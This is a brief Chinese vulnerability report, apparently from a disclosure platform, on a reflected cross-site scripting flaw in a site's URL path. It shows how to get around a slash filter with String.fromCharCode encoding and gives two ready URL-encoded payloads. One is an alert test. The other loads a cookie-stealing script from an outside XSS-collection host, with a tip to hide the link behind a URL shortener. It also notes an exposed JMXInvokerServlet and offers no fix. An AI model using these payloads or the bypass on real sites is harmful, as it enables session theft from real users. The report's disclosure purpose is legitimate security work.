先弹一下。。。。。。
然后想着盲打,开始怎么试都不行,以为是 / 被过滤掉了。
后来想想,这个是URI形成的跨站如果有 / 结构就被破坏了。
可以用charcode编码一次,再用string.fromcharcode解码回来就可以绕过/的限制了。
弹窗的
%3Cvideo%3E%3Csource%20onerror=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62%29%29%3E.htm
截cookie的
%3Cvideo%3E%3Ciframe%20onload=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,109,97,103,105,99,120,115,115,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62%29%29%3E.htm
成功截获cookie
=-=! URL好长可以用短地址修饰下。
外带两个
error message
JMXInvokerServlet
修复方案:不会~
